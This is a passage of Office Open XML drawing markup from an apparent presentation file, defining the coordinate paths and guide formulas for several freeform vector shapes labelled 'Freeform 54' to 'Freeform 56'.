                  <a:gd name="T44" fmla="*/ 58 w 494"/>
                  <a:gd name="T45" fmla="*/ 53 h 752"/>
                  <a:gd name="T46" fmla="*/ 183 w 494"/>
                  <a:gd name="T47" fmla="*/ 5 h 752"/>
                  <a:gd name="T48" fmla="*/ 272 w 494"/>
                  <a:gd name="T49" fmla="*/ 0 h 752"/>
                  <a:gd name="T50" fmla="*/ 346 w 494"/>
                  <a:gd name="T51" fmla="*/ 26 h 752"/>
                  <a:gd name="T52" fmla="*/ 409 w 494"/>
                  <a:gd name="T53" fmla="*/ 115 h 752"/>
                  <a:gd name="T54" fmla="*/ 425 w 494"/>
                  <a:gd name="T55" fmla="*/ 189 h 752"/>
                  <a:gd name="T56" fmla="*/ 409 w 494"/>
                  <a:gd name="T57" fmla="*/ 268 h 752"/>
                  <a:gd name="T58" fmla="*/ 378 w 494"/>
                  <a:gd name="T59" fmla="*/ 310 h 752"/>
                  <a:gd name="T60" fmla="*/ 336 w 494"/>
                  <a:gd name="T61" fmla="*/ 336 h 752"/>
                  <a:gd name="T62" fmla="*/ 399 w 494"/>
                  <a:gd name="T63" fmla="*/ 347 h 752"/>
                  <a:gd name="T64" fmla="*/ 446 w 494"/>
                  <a:gd name="T65" fmla="*/ 378 h 752"/>
                  <a:gd name="T66" fmla="*/ 483 w 494"/>
                  <a:gd name="T67" fmla="*/ 457 h 752"/>
                  <a:gd name="T68" fmla="*/ 493 w 494"/>
                  <a:gd name="T69" fmla="*/ 525 h 752"/>
                  <a:gd name="T70" fmla="*/ 488 w 494"/>
                  <a:gd name="T71" fmla="*/ 604 h 752"/>
                  <a:gd name="T72" fmla="*/ 441 w 494"/>
                  <a:gd name="T73" fmla="*/ 677 h 752"/>
                  <a:gd name="T74" fmla="*/ 383 w 494"/>
                  <a:gd name="T75" fmla="*/ 719 h 752"/>
                  <a:gd name="T76" fmla="*/ 283 w 494"/>
                  <a:gd name="T77" fmla="*/ 745 h 752"/>
                  <a:gd name="T78" fmla="*/ 152 w 494"/>
                  <a:gd name="T79" fmla="*/ 735 h 752"/>
                  <a:gd name="T80" fmla="*/ 89 w 494"/>
                  <a:gd name="T81" fmla="*/ 682 h 752"/>
                  <a:gd name="T82" fmla="*/ 42 w 494"/>
                  <a:gd name="T83" fmla="*/ 556 h 752"/>
                  <a:gd name="T84" fmla="*/ 178 w 494"/>
                  <a:gd name="T85" fmla="*/ 530 h 7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94" h="752">
                    <a:moveTo>
                      <a:pt x="215" y="625"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="215" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="625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7" name="Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5568950" y="6384925"/>
                <a:ext cx="60325" cy="68263"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 169"/>
                  <a:gd name="T1" fmla="*/ 163 h 190"/>
                  <a:gd name="T2" fmla="*/ 37 w 169"/>
                  <a:gd name="T3" fmla="*/ 189 h 190"/>
                  <a:gd name="T4" fmla="*/ 0 w 169"/>
                  <a:gd name="T5" fmla="*/ 32 h 190"/>
                  <a:gd name="T6" fmla="*/ 137 w 169"/>
                  <a:gd name="T7" fmla="*/ 0 h 190"/>
                  <a:gd name="T8" fmla="*/ 168 w 169"/>
                  <a:gd name="T9" fmla="*/ 163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9" h="190">
                    <a:moveTo>
                      <a:pt x="168" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="163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8" name="Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5692775" y="6080125"/>
                <a:ext cx="307975" cy="328613"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 210 w 857"/>
                  <a:gd name="T1" fmla="*/ 136 h 914"/>
                  <a:gd name="T2" fmla="*/ 478 w 857"/>
                  <a:gd name="T3" fmla="*/ 603 h 914"/>
                  <a:gd name="T4" fmla="*/ 478 w 857"/>
                  <a:gd name="T5" fmla="*/ 603 h 914"/>
                  <a:gd name="T6" fmla="*/ 415 w 857"/>
                  <a:gd name="T7" fmla="*/ 73 h 914"/>
                  <a:gd name="T8" fmla="*/ 625 w 857"/>
                  <a:gd name="T9" fmla="*/ 0 h 914"/>
                  <a:gd name="T10" fmla="*/ 856 w 857"/>
                  <a:gd name="T11" fmla="*/ 709 h 914"/>
                  <a:gd name="T12" fmla="*/ 725 w 857"/>
                  <a:gd name="T13" fmla="*/ 750 h 914"/>
                  <a:gd name="T14" fmla="*/ 541 w 857"/>
                  <a:gd name="T15" fmla="*/ 189 h 914"/>
                  <a:gd name="T16" fmla="*/ 541 w 857"/>
                  <a:gd name="T17" fmla="*/ 189 h 914"/>
                  <a:gd name="T18" fmla="*/ 599 w 857"/>
                  <a:gd name="T19" fmla="*/ 793 h 914"/>
                  <a:gd name="T20" fmla="*/ 488 w 857"/>
                  <a:gd name="T21" fmla="*/ 829 h 914"/>
                  <a:gd name="T22" fmla="*/ 179 w 857"/>
                  <a:gd name="T23" fmla="*/ 304 h 914"/>
                  <a:gd name="T24" fmla="*/ 179 w 857"/>
                  <a:gd name="T25" fmla="*/ 304 h 914"/>
                  <a:gd name="T26" fmla="*/ 363 w 857"/>
                  <a:gd name="T27" fmla="*/ 871 h 914"/>
                  <a:gd name="T28" fmla="*/ 231 w 857"/>
                  <a:gd name="T29" fmla="*/ 913 h 914"/>
                  <a:gd name="T30" fmla="*/ 0 w 857"/>
                  <a:gd name="T31" fmla="*/ 205 h 914"/>
                  <a:gd name="T32" fmla="*/ 210 w 857"/>
                  <a:gd name="T33" fmla="*/ 136 h 9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57" h="914">
                    <a:moveTo>
                      <a:pt x="210" y="136"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="478" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="871"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="136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9" name="Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5986463" y="6086475"/>
                <a:ext cx="203200" cy="222250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 563"/>
                  <a:gd name="T1" fmla="*/ 268 h 616"/>
                  <a:gd name="T2" fmla="*/ 0 w 563"/>
                  <a:gd name="T3" fmla="*/ 184 h 616"/>
                  <a:gd name="T4" fmla="*/ 5 w 563"/>
                  <a:gd name="T5" fmla="*/ 153 h 616"/>
                  <a:gd name="T6" fmla="*/ 16 w 563"/>
                  <a:gd name="T7" fmla="*/ 121 h 616"/>
                  <a:gd name="T8" fmla="*/ 63 w 563"/>
                  <a:gd name="T9" fmla="*/ 69 h 616"/>
                  <a:gd name="T10" fmla="*/ 95 w 563"/>
                  <a:gd name="T11" fmla="*/ 48 h 616"/>
                  <a:gd name="T12" fmla="*/ 132 w 563"/>
                  <a:gd name="T13" fmla="*/ 32 h 616"/>
                  <a:gd name="T14" fmla="*/ 231 w 563"/>
                  <a:gd name="T15" fmla="*/ 0 h 616"/>
                  <a:gd name="T16" fmla="*/ 268 w 563"/>
                  <a:gd name="T17" fmla="*/ 0 h 616"/>
                  <a:gd name="T18" fmla="*/ 299 w 563"/>
                  <a:gd name="T19" fmla="*/ 11 h 616"/>
                  <a:gd name="T20" fmla="*/ 352 w 563"/>
                  <a:gd name="T21" fmla="*/ 48 h 616"/>
                  <a:gd name="T22" fmla="*/ 368 w 563"/>
                  <a:gd name="T23" fmla="*/ 74 h 616"/>
                  <a:gd name="T24" fmla="*/ 499 w 563"/>
                  <a:gd name="T25" fmla="*/ 378 h 616"/>
                  <a:gd name="T26" fmla="*/ 530 w 563"/>
                  <a:gd name="T27" fmla="*/ 431 h 616"/>
                  <a:gd name="T28" fmla="*/ 562 w 563"/>
                  <a:gd name="T29" fmla="*/ 473 h 616"/>
                  <a:gd name="T30" fmla="*/ 436 w 563"/>
                  <a:gd name="T31" fmla="*/ 525 h 616"/>
                  <a:gd name="T32" fmla="*/ 415 w 563"/>
                  <a:gd name="T33" fmla="*/ 505 h 616"/>
                  <a:gd name="T34" fmla="*/ 394 w 563"/>
                  <a:gd name="T35" fmla="*/ 478 h 616"/>
                  <a:gd name="T36" fmla="*/ 383 w 563"/>
                  <a:gd name="T37" fmla="*/ 520 h 616"/>
                  <a:gd name="T38" fmla="*/ 363 w 563"/>
                  <a:gd name="T39" fmla="*/ 552 h 616"/>
                  <a:gd name="T40" fmla="*/ 331 w 563"/>
                  <a:gd name="T41" fmla="*/ 578 h 616"/>
                  <a:gd name="T42" fmla="*/ 289 w 563"/>
                  <a:gd name="T43" fmla="*/ 599 h 616"/>
                  <a:gd name="T44" fmla="*/ 226 w 563"/>
                  <a:gd name="T45" fmla="*/ 615 h 616"/>
                  <a:gd name="T46" fmla="*/ 199 w 563"/>
                  <a:gd name="T47" fmla="*/ 609 h 616"/>
                  <a:gd name="T48" fmla="*/ 173 w 563"/>
                  <a:gd name="T49" fmla="*/ 594 h 616"/>
                  <a:gd name="T50" fmla="*/ 132 w 563"/>
                  <a:gd name="T51" fmla="*/ 557 h 616"/>
                  <a:gd name="T52" fmla="*/ 116 w 563"/>
                  <a:gd name="T53" fmla="*/ 536 h 616"/>
                  <a:gd name="T54" fmla="*/ 105 w 563"/>
                  <a:gd name="T55" fmla="*/ 510 h 616"/>
                  <a:gd name="T56" fmla="*/ 84 w 563"/>
                  <a:gd name="T57" fmla="*/ 441 h 616"/>
                  <a:gd name="T58" fmla="*/ 84 w 563"/>
                  <a:gd name="T59" fmla="*/ 415 h 616"/>
                  <a:gd name="T60" fmla="*/ 89 w 563"/>
                  <a:gd name="T61" fmla="*/ 389 h 616"/>
                  <a:gd name="T62" fmla="*/ 116 w 563"/>
                  <a:gd name="T63" fmla="*/ 337 h 616"/>
                  <a:gd name="T64" fmla="*/ 137 w 563"/>
                  <a:gd name="T65" fmla="*/ 315 h 616"/>
                  <a:gd name="T66" fmla="*/ 231 w 563"/>
                  <a:gd name="T67" fmla="*/ 242 h 616"/>
                  <a:gd name="T68" fmla="*/ 252 w 563"/>
                  <a:gd name="T69" fmla="*/ 221 h 616"/>
                  <a:gd name="T70" fmla="*/ 263 w 563"/>
                  <a:gd name="T71" fmla="*/ 200 h 616"/>
                  <a:gd name="T72" fmla="*/ 257 w 563"/>
                  <a:gd name="T73" fmla="*/ 158 h 616"/>
                  <a:gd name="T74" fmla="*/ 242 w 563"/>
                  <a:gd name="T75" fmla="*/ 132 h 616"/>
                  <a:gd name="T76" fmla="*/ 221 w 563"/>
                  <a:gd name="T77" fmla="*/ 116 h 616"/>
                  <a:gd name="T78" fmla="*/ 199 w 563"/>
                  <a:gd name="T79" fmla="*/ 111 h 616"/>
                  <a:gd name="T80" fmla="*/ 168 w 563"/>
                  <a:gd name="T81" fmla="*/ 121 h 616"/>
                  <a:gd name="T82" fmla="*/ 137 w 563"/>
                  <a:gd name="T83" fmla="*/ 147 h 616"/>
                  <a:gd name="T84" fmla="*/ 132 w 563"/>
                  <a:gd name="T85" fmla="*/ 158 h 616"/>
                  <a:gd name="T86" fmla="*/ 137 w 563"/>
                  <a:gd name="T87" fmla="*/ 216 h 616"/>
                  <a:gd name="T88" fmla="*/ 26 w 563"/>
                  <a:gd name="T89" fmla="*/ 279 h 616"/>
                  <a:gd name="T90" fmla="*/ 284 w 563"/>
                  <a:gd name="T91" fmla="*/ 305 h 616"/>
                  <a:gd name="T92" fmla="*/ 263 w 563"/>
                  <a:gd name="T93" fmla="*/ 326 h 616"/>
                  <a:gd name="T94" fmla="*/ 231 w 563"/>
                  <a:gd name="T95" fmla="*/ 352 h 616"/>
                  <a:gd name="T96" fmla="*/ 216 w 563"/>
                  <a:gd name="T97" fmla="*/ 378 h 616"/>
                  <a:gd name="T98" fmla="*/ 226 w 563"/>
                  <a:gd name="T99" fmla="*/ 441 h 616"/>
                  <a:gd name="T100" fmla="*/ 236 w 563"/>
                  <a:gd name="T101" fmla="*/ 468 h 616"/>
                  <a:gd name="T102" fmla="*/ 257 w 563"/>
                  <a:gd name="T103" fmla="*/ 484 h 616"/>
                  <a:gd name="T104" fmla="*/ 279 w 563"/>
                  <a:gd name="T105" fmla="*/ 494 h 616"/>
                  <a:gd name="T106" fmla="*/ 305 w 563"/>
                  <a:gd name="T107" fmla="*/ 489 h 616"/>
                  <a:gd name="T108" fmla="*/ 331 w 563"/>
                  <a:gd name="T109" fmla="*/ 473 h 616"/>
                  <a:gd name="T110" fmla="*/ 352 w 563"/>
                  <a:gd name="T111" fmla="*/ 447 h 616"/>
                  <a:gd name="T112" fmla="*/ 357 w 563"/>
                  <a:gd name="T113" fmla="*/ 431 h 616"/>
                  <a:gd name="T114" fmla="*/ 357 w 563"/>
                  <a:gd name="T115" fmla="*/ 415 h 616"/>
                  <a:gd name="T116" fmla="*/ 352 w 563"/>
                  <a:gd name="T117" fmla="*/ 373 h 616"/>
                  <a:gd name="T118" fmla="*/ 310 w 563"/>
                  <a:gd name="T119" fmla="*/ 274 h 6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563" h="616">
                    <a:moveTo>
                      <a:pt x="21" y="268"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="441"/>
